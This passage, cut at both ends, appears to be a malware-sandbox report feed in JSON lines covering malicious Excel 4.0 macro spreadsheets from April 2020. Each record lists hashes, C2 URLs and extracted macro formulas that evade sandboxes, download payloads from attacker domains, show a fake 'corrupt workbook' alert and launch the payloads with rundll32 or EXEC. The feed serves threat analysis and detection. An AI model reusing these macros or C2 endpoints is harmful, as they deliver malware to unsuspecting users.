,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IpIJtNBksi\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3bdbef1275c796544fba2b3d9fc3b676df40a3dd0b2250a09d1b282a8ff7747f"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3bdbef1275c796544fba2b3d9fc3b676df40a3dd0b2250a09d1b282a8ff7747f","filesize":168448,"md5":"7128e047632fd8e6d2e7d1c6d362edc8","sha1":"84f10726d369d40d98c9c800bb17a9aa8920bfe1","sha256":"3bdbef1275c796544fba2b3d9fc3b676df40a3dd0b2250a09d1b282a8ff7747f","sha512":"ff42ec767c6864d0cf93bf1e98fa9f36544cc1c206764fc14f40e8f0b36165f743b581ae754508b42162f34958dd06069a416fc05bde5228ffddc9a72e885c7c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3bdbef1275c796544fba2b3d9fc3b676df40a3dd0b2250a09d1b282a8ff7747f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RLXN8fCY3L\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3be3a8337bab20ad3772ce9a2b768efcb693094f6d02f16befe08227673c4ff6"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3be3a8337bab20ad3772ce9a2b768efcb693094f6d02f16befe08227673c4ff6","filesize":212992,"md5":"aa710d37691e5bb06d170982eb64a443","sha1":"3fcd1cb96f2c082d35ad509b68c4f86c60d6777c","sha256":"3be3a8337bab20ad3772ce9a2b768efcb693094f6d02f16befe08227673c4ff6","sha512":"6fe9b15ed50c0b6621683764b4a30a25c9e26e7aed64fa779f21a28a04e8362432e7331ea5df14433186913d6c5bfaecceae637cdeaeac68f5666fe641f2654c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3be3a8337bab20ad3772ce9a2b768efcb693094f6d02f16befe08227673c4ff6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"c6yHWaddQh\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3be42794f4b97bb21a7c681521aa00779005e7798ee4579d71b906c77afbaf3d"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3be42794f4b97bb21a7c681521aa00779005e7798ee4579d71b906c77afbaf3d","filesize":182784,"md5":"566d2fe6f02f29efde0eebb50ca2c381","sha1":"fd564596eb214ad51df5579d22b9030ae7def372","sha256":"3be42794f4b97bb21a7c681521aa00779005e7798ee4579d71b906c77afbaf3d","sha512":"ef4ed225e132627fec12a9dc3547d2e617b18b75f4c095cd5cef10f63f478b2b16d4097f67756378bb7cd12561b136b1e783216fad0cfbc14740910fd86e33be","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3be42794f4b97bb21a7c681521aa00779005e7798ee4579d71b906c77afbaf3d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://g2creditsolutions.com/trusty/444444.png","http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png"],"attr":{"formulas":"ERROR(FALSE)\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://g2creditsolutions.com/trusty/444444.png\",\"c:\\Users\\Public\\1.exe\",0,0)\nIF(R$1C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png\",\"c:\\Users\\Public\\1.exe\",0,0),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\1.exe\")\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"SDJKv3\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3beab0b52095909c9744ace06522e24a0344e7d771ed52ee7633d97eeb32820a"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3beab0b52095909c9744ace06522e24a0344e7d771ed52ee7633d97eeb32820a","filesize":185344,"md5":"56a650809ed2e8c2fea92bc7430f868b","sha1":"df4e66abe5e135793e092068d057ee5921276141","sha256":"3beab0b52095909c9744ace06522e24a0344e7d771ed52ee7633d97eeb32820a","sha512":"d1c996a0edf7725d57e042269e53f7fdbf95fb28c4ab0dc187e2e8b437ebb1adfb55d2521ac2c6120cbe50776106335fa3754f90b40cfab37d09507430b7dd2b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3beab0b52095909c9744ace06522e24a0344e7d771ed52ee7633d97eeb32820a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3bff950708d46614634d43c571acd13b4699d47286b24bf10cab9d7c18abc0e5"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3bff950708d46614634d43c571acd13b4699d47286b24bf10cab9d7c18abc0e5","filesize":185344,"md5":"7a4b4a07005f7b4865705dc798ccea8a","sha1":"054d837ca3c69ab510e426f2b405537290617f84","sha256":"3bff950708d46614634d43c571acd13b4699d47286b24bf10cab9d7c18abc0e5","sha512":"070bd08ed407892d24149aa13b8ec88861eb5695190b189fbac163ffca94a57083d67f0a96b01b595b3744c4c71f34dd0fd6d6bad2a8cfbc5069393b588e3d93","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3bff950708d46614634d43c571acd13b4699d47286b24bf10cab9d7c18abc0e5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3c1bcdda555992acb5022606f2167127b651a1122476c44e86f8a7dde73f989c"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3c1bcdda555992acb5022606f2167127b651a1122476c44e86f8a7dde73f989c","filesize":168448,"md5":"e116c76313f90e77a3f3e093226d0f31","sha1":"366322aa5fab85b58c18e04151c8e87c2123ec18","sha256":"3c1bcdda555992acb5022606f2167127b651a1122476c44e86f8a7dde73f989c","sha512":"b1f71fe54ff4b00590a6d34d910bc8b1e1658e4389cd5e44bdd4bb6020ad9f7693ea140d6985d82a5528dfea81b3d2a007fbe3b8c6f04d7be5fa21e5c635cb6e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3c1bcdda555992acb5022606f2167127b651a1122476c44e86f8a7dde73f989c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Z5a4ewWi8N\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3c1d2f07b5e984fb15c22828f2a78cddfd46fccc2bb22d295c7abad68bbe0842"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3c1d2f07b5e984fb15c22828f2a78cddfd46fccc2bb22d295c7abad68bbe0842","filesize":112128,"md5":"3e7143b91d6de522df37b839fc1cde2c","sha1":"f4ad60bcb38c66be348a41e670d84ceac0ba3a76","sha256":"3c1d2f07b5e984fb15c22828f2a78cddfd46fccc2bb22d295c7abad68bbe0842","sha512":"b17bb0eddd18e1b73fab08b454a081cc324976ddd4810c46a737ca0adae3b5819cf6316528ca762c6d79ca7abfa5bcbe8c40c617eca7ab573325b14372b3b79e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3c1d2f07b5e984fb15c22828f2a78cddfd46fccc2bb22d295c7abad68bbe0842.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3c2956f8c1adf77758da4630677edd7c9c862ae0713ea4f99f5af94347e803ce"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3c2956f8c1adf77758da4630677edd7c9c862ae0713ea4f99f5af94347e803ce","filesize":104448,"md5":"24d64a6be2ac22ca44f2c8b84ce43366","sha1":"33047ee55d8505132d3225085fd96c1b8254a126","sha256":"3c2956f8c1adf77758da4630677edd7c9c862ae0713ea4f99f5af94347e803ce","sha512":"51034869c698048568236b41a663b64034ee73aa3ebd7db8d55b2ce0f030032c12a24a7064e34de64b802555abc7e912403e44e2a50022dcb940bd7e9e82ebaa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3c2956f8c1adf77758da4630677edd7c9c862ae0713ea4f99f5af94347e803ce.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ShSMeIgevL\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3c2f27edc3cd64606a7951c3a0137dabf2a4f5f68e12895d34b201eeb8c698ed"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3c2f27edc3cd64606a7951c3a0137dabf2a4f5f68e12895d34b201eeb8c698ed","filesize":144384,"md5":"01af056ec6e9db559f15f82fcc5dc9e6","sha1":"66810f49d067b447ee8b2e2084ed114eb011c74d","sha256":"3c2f27edc3cd64606a7951c3a0137dabf2a4f5f68e12895d34b201eeb8c698ed","sha512":"1f27dd439f1d3da1470d751876b924a1cd7bf9070fd2561300cc0854b29e10dcf3eaafb519169630b511fcdbf5708412f01d82a407991d9ad87cc5db8642bf0b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3c2f27edc3cd64606a7951c3a0137dabf2a4f5f68e12895d34b201eeb8c698ed.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"Nw6Ft6UQ0L\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3c3332e0987e79f68dbb9cc06a3039c440b6bfccb79e82ba114e04ef262f2677"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3c3332e0987e79f68dbb9cc06a3039c440b6bfccb79e82ba114e04ef262f2677","filesize":141312,"md5":"0133fc241439696b358b86de61440b11","sha1":"8d02be0d66ce7b67c596d87c233fc17a95b6e0cd","sha256":"3c3332e0987e79f68dbb9cc06a3039c440b6bfccb79e82ba114e04ef262f2677","sha512":"b2a7c1eff7df4f276ba467bcc7724b32645a3256416b5ccd1b027a504b7ff0943b4bf6883960a87572cc6b80c02b21e9481fa912684bc5743c2a03e2b66ed4ed","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3c3332e0987e79f68dbb9cc06a3039c440b6bfccb79e82ba114e04ef262f2677.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"7spr8LkQmH\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3c497d43cb7ab34ebd6002490a6822e3016ac1901b2ce9a43fef4ccee35c101a"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3c497d43cb7ab34ebd6002490a6822e3016ac1901b2ce9a43fef4ccee35c101a","filesize":167936,"md5":"9709b6f37e25e6ae2c8c9f65cc573eb5","sha1":"33108a431205351a6915b5964caaa2942feec5ff","sha256":"3c497d43cb7ab34ebd6002490a6822e3016ac1901b2ce9a43fef4ccee35c101a","sha512":"0558f99e198c3caeb3358163630c5216de5ffb614c9bfc40666794c4670e5347540b2a8bd0acb0ea5993ed34a51b0f9d2ae66c7dea178db9f9ed4bca17afe8b4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3c497d43cb7ab34ebd6002490a6822e3016ac1901b2ce9a43fef4ccee35c101a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KDgGIsHy6P\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3c62194dfd0776a6612619c23ce957db36b7da3d2f84430e866e4ad39ab5deea"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3c62194dfd0776a6612619c23ce957db36b7da3d2f84430e866e4ad39ab5deea","filesize":152576,"md5":"01889053a858c8f392c6f90956941086","sha1":"ca3bc954d1847fdcc860269e253d6744f677598f","sha256":"3c62194dfd0776a6612619c23ce957db36b7da3d2f84430e866e4ad39ab5deea","sha512":"adadc5699fbf5271cb7edfe68b152e4dc7baea55a29c60c2eb9ce5d874f62851521fd6b173214638abfd1b4a9a19eee6ac26655d06cfac17beb885ecc55c9f7f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3c62194dfd0776a6612619c23ce957db36b7da3d2f84430e866e4ad39ab5deea.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4NIkk2WKxs\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3c68ab82c6ad3ada9c79d87db7e948f05df2c5783c3c00c60f62ca78cebfe1e4"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3c68ab82c6ad3ada9c79d87db7e948f05df2c5783c3c00c60f62ca78cebfe1e4","filesize":112640,"md5":"0ae1683a1380ce3e2d7521fefc7a5c28","sha1":"c1bb1025db289331dcea00f59619e017112344c6","sha256":"3c68ab82c6ad3ada9c79d87db7e948f05df2c5783c3c00c60f62ca78cebfe1e4","sha512":"85c9d45f167d324db2b2a61b6a9741bcfa364ffb1cef2d4cde66ce1c8d3b75b5d2289ea315039b424c18d23217aa3794a66ae2200e7f8cb470a77808864e310a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3c68ab82c6ad3ada9c79d87db7e948f05df2c5783c3c00c60f62ca78cebfe1e4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3c737e0ff8fd3484ea75558c40a923030fff69b2356b8869023bce6c2fc61cc0"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3c737e0ff8fd3484ea75558c40a923030fff69b2356b8869023bce6c2fc61cc0","filesize":185344,"md5":"bc90163cf6778c359ea51587f019a97d","sha1":"ec029bd8f160387b79d291a2812c6f48cfbcce16","sha256":"3c737e0ff8fd3484ea75558c40a923030fff69b2356b8869023bce6c2fc61cc0","sha512":"8361a7d0ba629a89a0d90b2002a65937b1e6a64905350f4f3298d2e28b820981239c9bd8900608eca9f4075cc24eaad3506df82d4e081bf99e8b05ab5c5d1067","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3c737e0ff8fd3484ea75558c40a923030fff69b2356b8869023bce6c2fc61cc0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3c7fef18ed089c96ba27118a957d790b04fa9b5d74d3e4dfbc229d44e367fa0c"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3c7fef18ed089c96ba27118a957d790b04fa9b5d74d3e4dfbc229d44e367fa0c","filesize":104448,"md5":"8a5483dc73f132e6e9f6aba754f0389a","sha1":"d7cf0bafabc91c1ef7b2c15502029c5172435eae","sha256":"3c7fef18ed089c96ba27118a957d790b04fa9b5d74d3e4dfbc229d44e367fa0c","sha512":"8c37b13f48232c346667660f3efb881ea4e70d5b55dde8beeed687cd7452a8d4b0dfbb8222ac52e46680e58c3b0ee1dce2a09f38b1dd8820a59d66fa5e489eac","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3c7fef18ed089c96ba27118a957d790b04fa9b5d74d3e4dfbc229d44e367fa0c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"p7beqXFgZx\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3c80b2f9cfc66a21c4388eded6e19c902aafdf921c829e1c2cb57174b6b49b68"},"analysis":{"reported":"2020-04-09T16:15:51Z","score":10},"files":[{"filename":"3c80b2f9cfc66a21c4388eded6e19c902aafdf921c829e1c2cb57174b6b49b68","filesize":206336,"md5":"79b8894173e456ad6f0296ed62528309","sha1":"83a88ae99115076ace352d37e73bf403ad029efe","sha256":"3c80b2f9cfc66a21c4388eded6e19c902aafdf921c829e1c2cb57174b6b49b68","sha512":"ac50557f4bab0c1b2979aa92aa1b8c7b2f1efb8e1364dc295e7fcc262c1d29763857eb638822eebf99be49013279c8e75602ec66c28d1cbcd188edfab7f7e30e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3c80b2f9cfc66a21c4388eded6e19c902aafdf921c829e1c2cb57174b6b49b68.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's 